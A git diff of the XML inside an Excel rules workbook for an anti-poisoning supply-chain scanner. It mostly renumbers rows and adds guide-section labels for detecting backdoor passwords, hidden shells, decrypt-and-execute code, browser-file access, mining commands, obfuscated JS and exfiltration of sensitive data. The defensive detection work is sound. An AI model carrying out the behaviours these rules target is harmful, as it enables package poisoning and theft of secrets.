       <c r="B8" s="3" t="s">
-        <v>17</v>
+        <v>13</v>
       </c>
       <c r="C8" s="3" t="s">
-        <v>18</v>
+        <v>14</v>
       </c>
       <c r="D8" s="3" t="s">
-        <v>19</v>
+        <v>8</v>
       </c>
       <c r="E8" s="3" t="s">
         <v>9</v>
       </c>
       <c r="F8" s="2" t="s">
-        <v>20</v>
+        <v>15</v>
       </c>
       <c r="G8" s="4" t="s">
-        <v>111</v>
-      </c>
-    </row>
-    <row r="9" spans="1:7" ht="94.5" x14ac:dyDescent="0.3">
+        <v>141</v>
+      </c>
+    </row>
+    <row r="9" spans="1:7" ht="337.5" x14ac:dyDescent="0.3">
       <c r="A9" s="3" t="s">
         <v>16</v>
       </c>
-      <c r="B9" s="5" t="s">
-        <v>164</v>
+      <c r="B9" s="3" t="s">
+        <v>17</v>
       </c>
       <c r="C9" s="3" t="s">
-        <v>21</v>
+        <v>18</v>
       </c>
       <c r="D9" s="3" t="s">
         <v>19</v>
@@ -1323,67 +1332,67 @@
         <v>9</v>
       </c>
       <c r="F9" s="2" t="s">
-        <v>22</v>
+        <v>20</v>
       </c>
       <c r="G9" s="4" t="s">
-        <v>109</v>
+        <v>111</v>
       </c>
     </row>
     <row r="10" spans="1:7" ht="94.5" x14ac:dyDescent="0.3">
       <c r="A10" s="3" t="s">
         <v>16</v>
       </c>
-      <c r="B10" s="3" t="s">
-        <v>23</v>
+      <c r="B10" s="5" t="s">
+        <v>164</v>
       </c>
       <c r="C10" s="3" t="s">
-        <v>24</v>
+        <v>21</v>
       </c>
       <c r="D10" s="3" t="s">
-        <v>25</v>
+        <v>19</v>
       </c>
       <c r="E10" s="3" t="s">
         <v>9</v>
       </c>
       <c r="F10" s="2" t="s">
-        <v>26</v>
+        <v>22</v>
       </c>
       <c r="G10" s="4" t="s">
-        <v>112</v>
-      </c>
-    </row>
-    <row r="11" spans="1:7" ht="175.5" x14ac:dyDescent="0.3">
+        <v>109</v>
+      </c>
+    </row>
+    <row r="11" spans="1:7" ht="94.5" x14ac:dyDescent="0.3">
       <c r="A11" s="3" t="s">
         <v>16</v>
       </c>
       <c r="B11" s="3" t="s">
-        <v>27</v>
+        <v>23</v>
       </c>
       <c r="C11" s="3" t="s">
-        <v>28</v>
+        <v>24</v>
       </c>
       <c r="D11" s="3" t="s">
-        <v>19</v>
+        <v>25</v>
       </c>
       <c r="E11" s="3" t="s">
         <v>9</v>
       </c>
       <c r="F11" s="2" t="s">
-        <v>29</v>
+        <v>26</v>
       </c>
       <c r="G11" s="4" t="s">
-        <v>125</v>
+        <v>112</v>
       </c>
     </row>
     <row r="12" spans="1:7" ht="175.5" x14ac:dyDescent="0.3">
       <c r="A12" s="3" t="s">
         <v>16</v>
       </c>
-      <c r="B12" s="5" t="s">
-        <v>165</v>
+      <c r="B12" s="3" t="s">
+        <v>27</v>
       </c>
       <c r="C12" s="3" t="s">
-        <v>30</v>
+        <v>28</v>
       </c>
       <c r="D12" s="3" t="s">
         <v>19</v>
@@ -1391,19 +1400,19 @@
       <c r="E12" s="3" t="s">
         <v>9</v>
       </c>
-      <c r="F12" s="4" t="s">
-        <v>166</v>
+      <c r="F12" s="2" t="s">
+        <v>29</v>
       </c>
       <c r="G12" s="4" t="s">
-        <v>113</v>
-      </c>
-    </row>
-    <row r="13" spans="1:7" x14ac:dyDescent="0.3">
+        <v>125</v>
+      </c>
+    </row>
+    <row r="13" spans="1:7" ht="175.5" x14ac:dyDescent="0.3">
       <c r="A13" s="3" t="s">
         <v>16</v>
       </c>
       <c r="B13" s="5" t="s">
-        <v>114</v>
+        <v>165</v>
       </c>
       <c r="C13" s="3" t="s">
         <v>30</v>
@@ -1414,45 +1423,45 @@
       <c r="E13" s="3" t="s">
         <v>9</v>
       </c>
-      <c r="F13" s="3" t="s">
-        <v>31</v>
+      <c r="F13" s="4" t="s">
+        <v>166</v>
       </c>
       <c r="G13" s="4" t="s">
         <v>113</v>
       </c>
     </row>
-    <row r="14" spans="1:7" ht="148.5" x14ac:dyDescent="0.3">
+    <row r="14" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A14" s="3" t="s">
         <v>16</v>
       </c>
-      <c r="B14" s="3" t="s">
-        <v>32</v>
+      <c r="B14" s="5" t="s">
+        <v>114</v>
       </c>
       <c r="C14" s="3" t="s">
-        <v>33</v>
+        <v>30</v>
       </c>
       <c r="D14" s="3" t="s">
-        <v>34</v>
+        <v>19</v>
       </c>
       <c r="E14" s="3" t="s">
         <v>9</v>
       </c>
-      <c r="F14" s="2" t="s">
-        <v>35</v>
+      <c r="F14" s="3" t="s">
+        <v>31</v>
       </c>
       <c r="G14" s="4" t="s">
-        <v>115</v>
-      </c>
-    </row>
-    <row r="15" spans="1:7" ht="81" x14ac:dyDescent="0.3">
+        <v>113</v>
+      </c>
+    </row>
+    <row r="15" spans="1:7" ht="148.5" x14ac:dyDescent="0.3">
       <c r="A15" s="3" t="s">
         <v>16</v>
       </c>
       <c r="B15" s="3" t="s">
-        <v>36</v>
+        <v>32</v>
       </c>
       <c r="C15" s="3" t="s">
-        <v>37</v>
+        <v>33</v>
       </c>
       <c r="D15" s="3" t="s">
         <v>34</v>
@@ -1461,10 +1470,10 @@
         <v>9</v>
       </c>
       <c r="F15" s="2" t="s">
-        <v>38</v>
+        <v>35</v>
       </c>
       <c r="G15" s="4" t="s">
-        <v>117</v>
+        <v>115</v>
       </c>
     </row>
     <row r="16" spans="1:7" ht="81" x14ac:dyDescent="0.3">
@@ -1472,10 +1481,10 @@
         <v>16</v>
       </c>
       <c r="B16" s="3" t="s">
-        <v>39</v>
+        <v>36</v>
       </c>
       <c r="C16" s="3" t="s">
-        <v>40</v>
+        <v>37</v>
       </c>
       <c r="D16" s="3" t="s">
         <v>34</v>
@@ -1483,11 +1492,11 @@
       <c r="E16" s="3" t="s">
         <v>9</v>
       </c>
-      <c r="F16" s="4" t="s">
-        <v>118</v>
+      <c r="F16" s="2" t="s">
+        <v>38</v>
       </c>
       <c r="G16" s="4" t="s">
-        <v>120</v>
+        <v>117</v>
       </c>
     </row>
     <row r="17" spans="1:7" ht="81" x14ac:dyDescent="0.3">
@@ -1495,10 +1504,10 @@
         <v>16</v>
       </c>
       <c r="B17" s="3" t="s">
-        <v>41</v>
+        <v>39</v>
       </c>
       <c r="C17" s="3" t="s">
-        <v>42</v>
+        <v>40</v>
       </c>
       <c r="D17" s="3" t="s">
         <v>34</v>
@@ -1507,44 +1516,44 @@
         <v>9</v>
       </c>
       <c r="F17" s="4" t="s">
+        <v>118</v>
+      </c>
+      <c r="G17" s="4" t="s">
+        <v>120</v>
+      </c>
+    </row>
+    <row r="18" spans="1:7" ht="81" x14ac:dyDescent="0.3">
+      <c r="A18" s="3" t="s">
+        <v>16</v>
+      </c>
+      <c r="B18" s="3" t="s">
+        <v>41</v>
+      </c>
+      <c r="C18" s="3" t="s">
+        <v>42</v>
+      </c>
+      <c r="D18" s="3" t="s">
+        <v>34</v>
+      </c>
+      <c r="E18" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F18" s="4" t="s">
         <v>119</v>
       </c>
-      <c r="G17" s="4" t="s">
+      <c r="G18" s="4" t="s">
         <v>116</v>
       </c>
     </row>
-    <row r="18" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
-      <c r="A18" s="3" t="s">
-        <v>43</v>
-      </c>
-      <c r="B18" s="3" t="s">
-        <v>44</v>
-      </c>
-      <c r="C18" s="3" t="s">
-        <v>45</v>
-      </c>
-      <c r="D18" s="3" t="s">
-        <v>46</v>
-      </c>
-      <c r="E18" s="3" t="s">
-        <v>9</v>
-      </c>
-      <c r="F18" s="2" t="s">
-        <v>47</v>
-      </c>
-      <c r="G18" s="4" t="s">
-        <v>121</v>
-      </c>
-    </row>
-    <row r="19" spans="1:7" ht="189" x14ac:dyDescent="0.3">
+    <row r="19" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
       <c r="A19" s="3" t="s">
         <v>43</v>
       </c>
       <c r="B19" s="3" t="s">
-        <v>48</v>
+        <v>44</v>
       </c>
       <c r="C19" s="3" t="s">
-        <v>49</v>
+        <v>45</v>
       </c>
       <c r="D19" s="3" t="s">
         <v>46</v>
@@ -1553,44 +1562,44 @@
         <v>9</v>
       </c>
       <c r="F19" s="2" t="s">
+        <v>47</v>
+      </c>
+      <c r="G19" s="4" t="s">
+        <v>121</v>
+      </c>
+    </row>
+    <row r="20" spans="1:7" ht="189" x14ac:dyDescent="0.3">
+      <c r="A20" s="3" t="s">
+        <v>43</v>
+      </c>
+      <c r="B20" s="3" t="s">
+        <v>48</v>
+      </c>
+      <c r="C20" s="3" t="s">
+        <v>49</v>
+      </c>
+      <c r="D20" s="3" t="s">
+        <v>46</v>
+      </c>
+      <c r="E20" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F20" s="2" t="s">
         <v>50</v>
       </c>
-      <c r="G19" s="4" t="s">
+      <c r="G20" s="4" t="s">
         <v>122</v>
       </c>
     </row>
-    <row r="20" spans="1:7" ht="378" x14ac:dyDescent="0.3">
-      <c r="A20" s="3" t="s">
-        <v>51</v>
-      </c>
-      <c r="B20" s="5" t="s">
-        <v>123</v>
-      </c>
-      <c r="C20" s="3" t="s">
-        <v>52</v>
-      </c>
-      <c r="D20" s="3" t="s">
-        <v>53</v>
-      </c>
-      <c r="E20" s="3" t="s">
-        <v>9</v>
-      </c>
-      <c r="F20" s="2" t="s">
-        <v>54</v>
-      </c>
-      <c r="G20" s="4" t="s">
-        <v>144</v>
-      </c>
-    </row>
-    <row r="21" spans="1:7" ht="405" x14ac:dyDescent="0.3">
+    <row r="21" spans="1:7" ht="378" x14ac:dyDescent="0.3">
       <c r="A21" s="3" t="s">
         <v>51</v>
       </c>
-      <c r="B21" s="3" t="s">
-        <v>55</v>
+      <c r="B21" s="5" t="s">
+        <v>123</v>
       </c>
       <c r="C21" s="3" t="s">
-        <v>56</v>
+        <v>52</v>
       </c>
       <c r="D21" s="3" t="s">
         <v>53</v>
@@ -1598,22 +1607,22 @@
       <c r="E21" s="3" t="s">
         <v>9</v>
       </c>
-      <c r="F21" s="4" t="s">
-        <v>146</v>
+      <c r="F21" s="2" t="s">
+        <v>54</v>
       </c>
       <c r="G21" s="4" t="s">
-        <v>147</v>
-      </c>
-    </row>
-    <row r="22" spans="1:7" ht="409.5" x14ac:dyDescent="0.3">
+        <v>144</v>
+      </c>
+    </row>
+    <row r="22" spans="1:7" ht="405" x14ac:dyDescent="0.3">
       <c r="A22" s="3" t="s">
         <v>51</v>
       </c>
       <c r="B22" s="3" t="s">
-        <v>57</v>
+        <v>55</v>
       </c>
       <c r="C22" s="3" t="s">
-        <v>58</v>
+        <v>56</v>
       </c>
       <c r="D22" s="3" t="s">
         <v>53</v>
@@ -1625,18 +1634,18 @@
         <v>146</v>
       </c>
       <c r="G22" s="4" t="s">
-        <v>145</v>
-      </c>
-    </row>
-    <row r="23" spans="1:7" ht="405" x14ac:dyDescent="0.3">
+        <v>147</v>
+      </c>
+    </row>
+    <row r="23" spans="1:7" ht="409.5" x14ac:dyDescent="0.3">
       <c r="A23" s="3" t="s">
         <v>51</v>
       </c>
-      <c r="B23" s="5" t="s">
-        <v>124</v>
-      </c>
-      <c r="C23" s="5" t="s">
-        <v>135</v>
+      <c r="B23" s="3" t="s">
+        <v>57</v>
+      </c>
+      <c r="C23" s="3" t="s">
+        <v>58</v>
       </c>
       <c r="D23" s="3" t="s">
         <v>53</v>
@@ -1645,33 +1654,33 @@
         <v>9</v>
       </c>
       <c r="F23" s="4" t="s">
+        <v>146</v>
+      </c>
+      <c r="G23" s="4" t="s">
+        <v>145</v>
+      </c>
+    </row>
+    <row r="24" spans="1:7" ht="405" x14ac:dyDescent="0.3">
+      <c r="A24" s="3" t="s">
+        <v>51</v>
+      </c>
+      <c r="B24" s="5" t="s">
+        <v>124</v>
+      </c>
+      <c r="C24" s="5" t="s">
+        <v>135</v>
+      </c>
+      <c r="D24" s="3" t="s">
+        <v>53</v>
+      </c>
+      <c r="E24" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F24" s="4" t="s">
         <v>136</v>
       </c>
-      <c r="G23" s="4" t="s">
+      <c r="G24" s="4" t="s">
         <v>148</v>
-      </c>
-    </row>
-    <row r="24" spans="1:7" x14ac:dyDescent="0.3">
-      <c r="A24" s="3" t="s">
-        <v>59</v>
-      </c>
-      <c r="B24" s="3" t="s">
-        <v>60</v>
-      </c>
-      <c r="C24" s="3" t="s">
-        <v>61</v>
-      </c>
-      <c r="D24" s="3" t="s">
-        <v>62</v>
-      </c>
-      <c r="E24" s="3" t="s">
-        <v>9</v>
-      </c>
-      <c r="F24" s="3" t="s">
-        <v>63</v>
-      </c>
-      <c r="G24" s="4" t="s">
-        <v>143</v>
       </c>
     </row>
     <row r="25" spans="1:7" x14ac:dyDescent="0.3">
@@ -1679,10 +1688,10 @@
         <v>59</v>
       </c>
       <c r="B25" s="3" t="s">
-        <v>64</v>
-      </c>
-      <c r="C25" s="5" t="s">
-        <v>138</v>
+        <v>60</v>
+      </c>
+      <c r="C25" s="3" t="s">
+        <v>61</v>
       </c>
       <c r="D25" s="3" t="s">
         <v>62</v>
@@ -1702,10 +1711,10 @@
         <v>59</v>
       </c>
       <c r="B26" s="3" t="s">
-        <v>65</v>
+        <v>64</v>
       </c>
       <c r="C26" s="5" t="s">
-        <v>137</v>
+        <v>138</v>
       </c>
       <c r="D26" s="3" t="s">
         <v>62</v>
@@ -1725,10 +1734,10 @@
         <v>59</v>
       </c>
       <c r="B27" s="3" t="s">
-        <v>66</v>
-      </c>
-      <c r="C27" s="3" t="s">
-        <v>28</v>
+        <v>65</v>
+      </c>
+      <c r="C27" s="5" t="s">
+        <v>137</v>
       </c>
       <c r="D27" s="3" t="s">
         <v>62</v>
@@ -1748,10 +1757,10 @@
         <v>59</v>
       </c>
       <c r="B28" s="3" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="C28" s="3" t="s">
-        <v>68</v>
+        <v>28</v>
       </c>
       <c r="D28" s="3" t="s">
         <v>62</v>
@@ -1771,10 +1780,10 @@
         <v>59</v>
       </c>
       <c r="B29" s="3" t="s">
-        <v>69</v>
+        <v>67</v>
       </c>
       <c r="C29" s="3" t="s">
-        <v>70</v>
+        <v>68</v>
       </c>
       <c r="D29" s="3" t="s">
         <v>62</v>
@@ -1794,10 +1803,10 @@
         <v>59</v>
       </c>
       <c r="B30" s="3" t="s">
-        <v>71</v>
-      </c>
-      <c r="C30" s="5" t="s">
-        <v>139</v>
+        <v>69</v>
+      </c>
+      <c r="C30" s="3" t="s">
+        <v>70</v>
       </c>
       <c r="D30" s="3" t="s">
         <v>62</v>
@@ -1816,11 +1825,11 @@
       <c r="A31" s="3" t="s">
         <v>59</v>
       </c>
-      <c r="B31" s="5" t="s">
-        <v>131</v>
+      <c r="B31" s="3" t="s">
+        <v>71</v>
       </c>
       <c r="C31" s="5" t="s">
-        <v>132</v>
+        <v>139</v>
       </c>
       <c r="D31" s="3" t="s">
         <v>62</v>
@@ -1839,11 +1848,11 @@
       <c r="A32" s="3" t="s">
         <v>59</v>
       </c>
-      <c r="B32" s="3" t="s">
-        <v>72</v>
-      </c>
-      <c r="C32" s="3" t="s">
-        <v>73</v>
+      <c r="B32" s="5" t="s">
+        <v>131</v>
+      </c>
+      <c r="C32" s="5" t="s">
+        <v>132</v>
       </c>
       <c r="D32" s="3" t="s">
         <v>62</v>
@@ -1863,10 +1872,10 @@
         <v>59</v>
       </c>
       <c r="B33" s="3" t="s">
-        <v>74</v>
+        <v>72</v>
       </c>
       <c r="C33" s="3" t="s">
-        <v>75</v>
+        <v>73</v>
       </c>
       <c r="D33" s="3" t="s">
         <v>62</v>
@@ -1886,10 +1895,10 @@
         <v>59</v>
       </c>
       <c r="B34" s="3" t="s">
-        <v>76</v>
+        <v>74</v>
       </c>
       <c r="C34" s="3" t="s">
-        <v>42</v>
+        <v>75</v>
       </c>
       <c r="D34" s="3" t="s">
         <v>62</v>
@@ -1908,11 +1917,11 @@
       <c r="A35" s="3" t="s">
         <v>59</v>
       </c>
-      <c r="B35" s="5" t="s">
-        <v>134</v>
-      </c>
-      <c r="C35" s="5" t="s">
-        <v>133</v>
+      <c r="B35" s="3" t="s">
+        <v>76</v>
+      </c>
+      <c r="C35" s="3" t="s">
+        <v>42</v>
       </c>
       <c r="D35" s="3" t="s">
         <v>62</v>
@@ -1931,11 +1940,11 @@
       <c r="A36" s="3" t="s">
         <v>59</v>
       </c>
-      <c r="B36" s="3" t="s">
-        <v>77</v>
-      </c>
-      <c r="C36" s="3" t="s">
-        <v>78</v>
+      <c r="B36" s="5" t="s">
+        <v>134</v>
+      </c>
+      <c r="C36" s="5" t="s">
+        <v>133</v>
       </c>
       <c r="D36" s="3" t="s">
         <v>62</v>
@@ -1950,38 +1959,38 @@
         <v>143</v>
       </c>
     </row>
-    <row r="37" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
+    <row r="37" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A37" s="3" t="s">
-        <v>79</v>
-      </c>
-      <c r="B37" s="5" t="s">
-        <v>126</v>
+        <v>59</v>
+      </c>
+      <c r="B37" s="3" t="s">
+        <v>77</v>
       </c>
       <c r="C37" s="3" t="s">
-        <v>80</v>
+        <v>78</v>
       </c>
       <c r="D37" s="3" t="s">
-        <v>81</v>
+        <v>62</v>
       </c>
       <c r="E37" s="3" t="s">
         <v>9</v>
       </c>
-      <c r="F37" s="2" t="s">
-        <v>82</v>
+      <c r="F37" s="3" t="s">
+        <v>63</v>
       </c>
       <c r="G37" s="4" t="s">
-        <v>149</v>
-      </c>
-    </row>
-    <row r="38" spans="1:7" ht="54" x14ac:dyDescent="0.3">
+        <v>143</v>
+      </c>
+    </row>
+    <row r="38" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
       <c r="A38" s="3" t="s">
         <v>79</v>
       </c>
-      <c r="B38" s="3" t="s">
-        <v>83</v>
+      <c r="B38" s="5" t="s">
+        <v>126</v>
       </c>
       <c r="C38" s="3" t="s">
-        <v>84</v>
+        <v>80</v>
       </c>
       <c r="D38" s="3" t="s">
         <v>81</v>
@@ -1989,11 +1998,11 @@
       <c r="E38" s="3" t="s">
         <v>9</v>
       </c>
-      <c r="F38" s="3" t="s">
-        <v>85</v>
+      <c r="F38" s="2" t="s">
+        <v>82</v>
       </c>
       <c r="G38" s="4" t="s">
-        <v>150</v>
+        <v>149</v>
       </c>
     </row>
     <row r="39" spans="1:7" ht="54" x14ac:dyDescent="0.3">
@@ -2001,22 +2010,22 @@
         <v>79</v>
       </c>
       <c r="B39" s="3" t="s">
-        <v>86</v>
+        <v>83</v>
       </c>
       <c r="C39" s="3" t="s">
-        <v>87</v>
+        <v>84</v>
       </c>
       <c r="D39" s="3" t="s">
-        <v>88</v>
+        <v>81</v>
       </c>
       <c r="E39" s="3" t="s">
         <v>9</v>
       </c>
       <c r="F39" s="3" t="s">
-        <v>89</v>
+        <v>85</v>
       </c>
       <c r="G39" s="4" t="s">
-        <v>151</v>
+        <v>150</v>
       </c>
     </row>
     <row r="40" spans="1:7" ht="54" x14ac:dyDescent="0.3">
@@ -2024,10 +2033,10 @@
         <v>79</v>
       </c>
       <c r="B40" s="3" t="s">
-        <v>90</v>
-      </c>
-      <c r="C40" s="5" t="s">
-        <v>127</v>
+        <v>86</v>
+      </c>
+      <c r="C40" s="3" t="s">
+        <v>87</v>
       </c>
       <c r="D40" s="3" t="s">
         <v>88</v>
@@ -2036,44 +2045,44 @@
         <v>9</v>
       </c>
       <c r="F40" s="3" t="s">
-        <v>91</v>
+        <v>89</v>
       </c>
       <c r="G40" s="4" t="s">
-        <v>152</v>
-      </c>
-    </row>
-    <row r="41" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
+        <v>151</v>
+      </c>
+    </row>
+    <row r="41" spans="1:7" ht="54" x14ac:dyDescent="0.3">
       <c r="A41" s="3" t="s">
         <v>79</v>
       </c>
-      <c r="B41" s="5" t="s">
-        <v>129</v>
-      </c>
-      <c r="C41" s="3" t="s">
-        <v>92</v>
+      <c r="B41" s="3" t="s">
+        <v>90</v>
+      </c>
+      <c r="C41" s="5" t="s">
+        <v>127</v>
       </c>
       <c r="D41" s="3" t="s">
-        <v>81</v>
+        <v>88</v>
       </c>
       <c r="E41" s="3" t="s">
         <v>9</v>
       </c>
       <c r="F41" s="3" t="s">
-        <v>93</v>
+        <v>91</v>
       </c>
       <c r="G41" s="4" t="s">
-        <v>153</v>
-      </c>
-    </row>
-    <row r="42" spans="1:7" ht="54" x14ac:dyDescent="0.3">
+        <v>152</v>
+      </c>
+    </row>
+    <row r="42" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
       <c r="A42" s="3" t="s">
         <v>79</v>
       </c>
       <c r="B42" s="5" t="s">
-        <v>128</v>
+        <v>129</v>
       </c>
       <c r="C42" s="3" t="s">
-        <v>94</v>
+        <v>92</v>
       </c>
       <c r="D42" s="3" t="s">
         <v>81</v>
@@ -2082,21 +2091,21 @@
         <v>9</v>
       </c>
       <c r="F42" s="3" t="s">
-        <v>95</v>
+        <v>93</v>
       </c>
       <c r="G42" s="4" t="s">
-        <v>130</v>
-      </c>
-    </row>
-    <row r="43" spans="1:7" x14ac:dyDescent="0.3">
+        <v>153</v>
+      </c>
+    </row>
+    <row r="43" spans="1:7" ht="54" x14ac:dyDescent="0.3">
       <c r="A43" s="3" t="s">
-        <v>96</v>
-      </c>
-      <c r="B43" s="3" t="s">
-        <v>97</v>
+        <v>79</v>
+      </c>
+      <c r="B43" s="5" t="s">
+        <v>128</v>
       </c>
       <c r="C43" s="3" t="s">
-        <v>98</v>
+        <v>94</v>
       </c>
       <c r="D43" s="3" t="s">
         <v>81</v>
@@ -2105,7 +2114,10 @@
         <v>9</v>
       </c>
       <c r="F43" s="3" t="s">
-        <v>9</v>
+        <v>95</v>
+      </c>
+      <c r="G43" s="4" t="s">
+        <v>130</v>
       </c>
     </row>
     <row r="44" spans="1:7" x14ac:dyDescent="0.3">
@@ -2113,10 +2125,10 @@
         <v>96</v>
       </c>
       <c r="B44" s="3" t="s">
-        <v>99</v>
+        <v>97</v>
       </c>
       <c r="C44" s="3" t="s">
-        <v>61</v>
+        <v>98</v>
       </c>
       <c r="D44" s="3" t="s">
         <v>81</v>
@@ -2133,10 +2145,10 @@
         <v>96</v>
       </c>
       <c r="B45" s="3" t="s">
-        <v>100</v>
+        <v>99</v>
       </c>
       <c r="C45" s="3" t="s">
-        <v>37</v>
+        <v>61</v>
       </c>
       <c r="D45" s="3" t="s">
         <v>81</v>
@@ -2153,7 +2165,7 @@
         <v>96</v>
       </c>
       <c r="B46" s="3" t="s">
-        <v>101</v>
+        <v>100</v>
       </c>
       <c r="C46" s="3" t="s">
         <v>37</v>
@@ -2173,10 +2185,10 @@
         <v>96</v>
       </c>
       <c r="B47" s="3" t="s">
-        <v>102</v>
+        <v>101</v>
       </c>
       <c r="C47" s="3" t="s">
-        <v>24</v>
+        <v>37</v>
       </c>
       <c r="D47" s="3" t="s">
         <v>81</v>
@@ -2193,13 +2205,13 @@
         <v>96</v>
       </c>
       <c r="B48" s="3" t="s">
-        <v>103</v>
+        <v>102</v>
       </c>
       <c r="C48" s="3" t="s">
-        <v>104</v>
+        <v>24</v>
       </c>
       <c r="D48" s="3" t="s">
-        <v>105</v>
+        <v>81</v>
       </c>
       <c r="E48" s="3" t="s">
         <v>9</v>
@@ -2213,28 +2225,40 @@
         <v>96</v>
       </c>
       <c r="B49" s="3" t="s">
+        <v>103</v>
+      </c>
+      <c r="C49" s="3" t="s">
+        <v>104</v>
+      </c>
+      <c r="D49" s="3" t="s">
+        <v>105</v>
+      </c>
+      <c r="E49" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F49" s="3" t="s">
+        <v>9</v>
+      </c>
+    </row>
+    <row r="50" spans="1:6" x14ac:dyDescent="0.3">
+      <c r="A50" s="3" t="s">
+        <v>96</v>
+      </c>
+      <c r="B50" s="3" t="s">
         <v>106</v>
       </c>
-      <c r="C49" s="3" t="s">
+      <c r="C50" s="3" t="s">
         <v>107</v>
       </c>
-      <c r="D49" s="3" t="s">
+      <c r="D50" s="3" t="s">
         <v>108</v>
       </c>
-      <c r="E49" s="3" t="s">
-        <v>9</v>
-      </c>
-      <c r="F49" s="3" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="50" spans="1:6" x14ac:dyDescent="0.3">
-      <c r="A50" s="3"/>
-      <c r="B50" s="3"/>
-      <c r="C50" s="3"/>
-      <c r="D50" s="3"/>
-      <c r="E50" s="3"/>
-      <c r="F50" s="3"/>
+      <c r="E50" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F50" s="3" t="s">
+        <v>9</v>
+      </c>
     </row>
     <row r="51" spans="1:6" x14ac:dyDescent="0.3">
       <c r="A51" s="3"/>
@@ -2260,8 +2284,16 @@
       <c r="E53" s="3"/>
       <c r="F53" s="3"/>
     </row>
+    <row r="54" spans="1:6" x14ac:dyDescent="0.3">
+      <c r="A54" s="3"/>
+      <c r="B54" s="3"/>
+      <c r="C54" s="3"/>
+      <c r="D54" s="3"/>
+      <c r="E54" s="3"/>
+      <c r="F54" s="3"/>
+    </row>
   </sheetData>
-  <autoFilter ref="A1:G49" xr:uid="{00000000-0009-0000-0000-000000000000}"/>
+  <autoFilter ref="A1:G50" xr:uid="{00000000-0009-0000-0000-000000000000}"/>
   <phoneticPr fontId="1" type="noConversion"/>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
   <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>

--- a/tools/SoftwareSupplyChainSecurity-v1/防投毒规则.xlsx
+++ b/tools/SoftwareSupplyChainSecurity-v1/防投毒规则.xlsx
@@ -1,14 +1,14 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="5" rupBuild="20396"/>
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="5" rupBuild="20397"/>
   <workbookPr/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\l00609832\Desktop\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="D:\PycharmProjects\new-repo\anti-poisoning\tools\SoftwareSupplyChainSecurity-v1\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{74F7B6D1-D9BE-4128-8C5C-EE0D76AEACA3}" xr6:coauthVersionLast="36" xr6:coauthVersionMax="36" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{B0FBF2FB-BB88-464F-A0D0-28DD8C72AF4F}" xr6:coauthVersionLast="36" xr6:coauthVersionMax="36" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="0" windowWidth="28620" windowHeight="11205" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
@@ -23,7 +23,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="686" uniqueCount="169">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="393" uniqueCount="197">
   <si>
     <t>语言类型</t>
   </si>
@@ -725,6 +725,114 @@
 此外，如果在开源代码中存放口令，容易被黑客窃取，从而造成损失。
 如果属于误报，请进行屏蔽。
 修复方式：放到执行环境的环境变量或配置文件中。</t>
+  </si>
+  <si>
+    <t>对应指南章节</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>2.1 后门密码检测</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>2.2 隐藏shell检测</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>2.3 解密执行检测</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>暂无</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>5.2 访问浏览器敏感文件</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>5.3 解码执行恶意命令</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>5.4 执行恶意挖矿命令</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>5.5 混淆JS恶意代码</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>5.1 收集敏感信息外发</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
